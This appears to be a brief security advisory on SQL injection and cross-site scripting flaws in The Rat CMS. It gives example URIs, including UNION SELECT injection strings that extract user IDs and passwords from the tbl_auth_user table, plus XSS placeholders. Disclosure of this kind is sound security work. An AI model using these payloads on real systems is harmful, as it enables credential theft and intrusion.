|
The Rat CMS Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim into following a malicious URI. The following example URIs are available: http://www.example.com/[trcms_path]/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user-- http://www.example.com/[trcms_path]/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user-- http://www.example.com/[trcms_path]/viewarticle.php/<XSS> http://www.example.com/[trcms_path]/viewarticle.php?id=<XSS> http://www.example.com/[trcms_path]/viewarticle2.php?id=<XSS> The following exploit code is available: |
|
 Privacy Statement |
